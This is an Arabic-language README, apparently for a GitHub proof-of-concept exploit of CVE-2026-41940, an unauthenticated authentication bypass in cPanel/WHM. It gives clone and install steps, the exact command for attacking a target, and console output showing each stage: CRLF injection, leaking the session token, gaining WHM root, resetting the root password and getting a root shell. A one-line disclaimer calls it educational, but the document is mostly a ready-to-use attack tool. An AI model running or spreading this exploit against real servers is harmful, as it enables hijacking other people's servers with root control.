
إثبات مفهوم لاستغلال CVE-2026-41940، وهو تجاوز للمصادقة دون مصادقة في cPanel/WHM باستخدام حقن CRLF لتسريب رموز الأمان وإعادة تعيين كلمة مرور الجذر.
CVE-2026-41940 هو استغلال إثبات مفهوم (PoC) يستهدف cPanel/WHM.
يوضح هذا الاستغلال تجاوزًا للمصادقة دون مصادقة باستخدام حقن CRLF لتسريب رموز الأمان والحصول على وصول بمستوى الجذر إلى واجهة WHM، مما يسمح بإجراءات مثل تغيير كلمة مرور الجذر.
إخلاء مسؤولية: هذا الاستغلال لأغراض تعليمية فقط. لا تستخدمه على أنظمة دون إذن.
cp_security_token.requests القياسية.git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
المتطلبات:
requests,urllib3
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
تعرض وحدة التحكم:
[0-4][+][!][*]مثال:
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| العلم | الوصف | مطلوب | الافتراضي |
|---|
--target | عنوان WHM المستهدف (مثل https://host:2087) | نعم | - |
--password | كلمة مرور جديدة لمستخدم الجذر | نعم | - |
--hostname | تجاوز رأس Host: | لا | تلقائي |